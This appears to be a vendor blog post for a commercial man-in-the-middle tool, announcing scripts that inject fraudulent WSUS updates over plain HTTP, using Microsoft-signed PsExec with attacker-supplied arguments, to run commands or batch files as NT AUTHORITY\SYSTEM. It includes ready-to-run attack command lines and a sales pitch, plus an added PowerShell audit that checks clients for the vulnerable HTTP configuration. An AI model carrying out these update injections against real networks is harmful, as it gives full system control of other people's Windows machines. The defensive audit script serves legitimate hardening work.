The power of dynamic socket injection: WSUS command execution as NT AUTHORITY\SYSTEM
Some time ago we published an important update to Syphoon, featuring the new dynamic socket injection system. In short, it lets Ruby code generate the injected content on the fly, so an injection can depend on the context of the intercepted connection.
Taking things further
To demonstrate the power of dynamic injections, we are publishing a new Syphoon release that ships some new scripts. Two of them attack Windows Server Update Services (WSUS) when clients are configured to fetch updates over plain HTTP rather than HTTPS.
The first script, wsus-inject-cmd, runs an arbitrary command (through cmd.exe) as NT AUTHORITY\SYSTEM on any client that requests updates from the WSUS server over HTTP. It does this by injecting a fraudulent update consisting of PsExec64.exe from the PsTools suite together with "installation arguments" that carry the desired command. PsExec is the vehicle because the update client only checks that the update binary carries a valid Microsoft signature; the install arguments handed to that binary are attacker-controlled and not covered by the signature.
The script takes two arguments: the port on which WSUS listens (8530 by default for HTTP) and the command to execute.
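Before relying on this, or defending against it, a practitioner wants to know whether a given client is actually in the vulnerable configuration. The following PowerShell is an added example written for this page, not Syphoon code and not part of the original post: it reads the WSUS values that Group Policy writes under HKLM (WUServer, WUStatusServer and UseWUServer) and flags an update server URL that uses plain HTTP. The ports 8530 (HTTP) and 8531 (HTTPS) are the WSUS defaults; the function name and output fields are assumptions of this example.

```powershell
# Added example, not part of Syphoon or the original post: audit a Windows
# client's WSUS settings and flag an update server reachable over plain HTTP,
# which is exactly the precondition the injection above relies on.
# Assumes it runs locally (or via Invoke-Command) with read access to HKLM.

function Get-WsusHttpExposure {
    [CmdletBinding()]
    param()

    # Values written by the "Specify intranet Microsoft update service location"
    # policy; they are absent when no WSUS policy applies to the machine.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $auKey     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'

    $policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
    $au     = Get-ItemProperty -Path $auKey     -ErrorAction SilentlyContinue

    $result = [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        WsusEnabled    = $false
        WUServer       = $policy.WUServer
        WUStatusServer = $policy.WUStatusServer
        Exposed        = $false
        Findings       = [System.Collections.Generic.List[string]]::new()
    }

    # UseWUServer=1 is what makes the client talk to WUServer instead of Microsoft Update.
    if ($au.UseWUServer -ne 1 -or [string]::IsNullOrWhiteSpace($policy.WUServer)) {
        $result.Findings.Add('No WSUS server enforced by policy; client uses Microsoft Update directly')
        return $result
    }
    $result.WsusEnabled = $true

    foreach ($name in 'WUServer', 'WUStatusServer') {
        $url = $policy.$name
        if ([string]::IsNullOrWhiteSpace($url)) {
            $result.Findings.Add("$name is not set")
            continue
        }
        $uri = $null
        if (-not [System.Uri]::TryCreate($url, [System.UriKind]::Absolute, [ref]$uri)) {
            $result.Findings.Add("$name is not a valid absolute URL: $url")
            continue
        }
        switch ($uri.Scheme) {
            'http' {
                $result.Exposed = $true
                $result.Findings.Add("$name uses plain HTTP ($url): an on-path attacker can inject updates")
            }
            'https' {
                # 8531 is the conventional WSUS TLS port; 8530 is the plain-HTTP one.
                if ($uri.Port -eq 8530) {
                    $result.Findings.Add("$name is HTTPS but on port 8530; confirm the server really serves TLS there")
                }
            }
            default {
                $result.Findings.Add("$name uses unexpected scheme '$($uri.Scheme)': $url")
            }
        }
    }
    return $result
}

# Usage: run from a compliance job and act on Exposed.
$audit = Get-WsusHttpExposure
$audit | Format-List
if ($audit.Exposed) {
    Write-Warning 'WSUS over HTTP: enable SSL on the WSUS server and point clients at https://<server>:8531'
}
```

Both WUServer and WUStatusServer are checked because the client downloads update metadata and reports status to whichever URL each one names; an HTTPS WUServer paired with an HTTP WUStatusServer is still a misconfiguration worth a finding.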
As an example, let's write the current user name to a file at the root of the C: drive with this simple command:
# syphoon -a "wsus-inject-cmd:8530 'whoami > C:/pwn.txt'" -I WSUS_SRV_IP wlan0
The Windows client happily downloads and installs the "update":
Immediately after this, a file appears on the C: drive:
There will inevitably be cases where the command to execute gets quite long, and usually we want to run more than one command.
For this kind of scenario, the wsus-inject-bat script offers a more flexible approach: instead of a single command, an entire batch script is injected.
The batch script must be saved as DROOT/htfilesrv/wsus_pwn.bat (an example is included in the Syphoon distribution). Let's configure it to write the user name to a text file again:
Using it is as simple as (only the port is needed, since the commands come from the batch file):
# syphoon -a "wsus-inject-bat:8530" -I WSUS_SRV_IP wlan0
All of this is available in the latest Syphoon release: 1.4.3
Get your license today from the store: Syphoon - Weapons-Grade MitM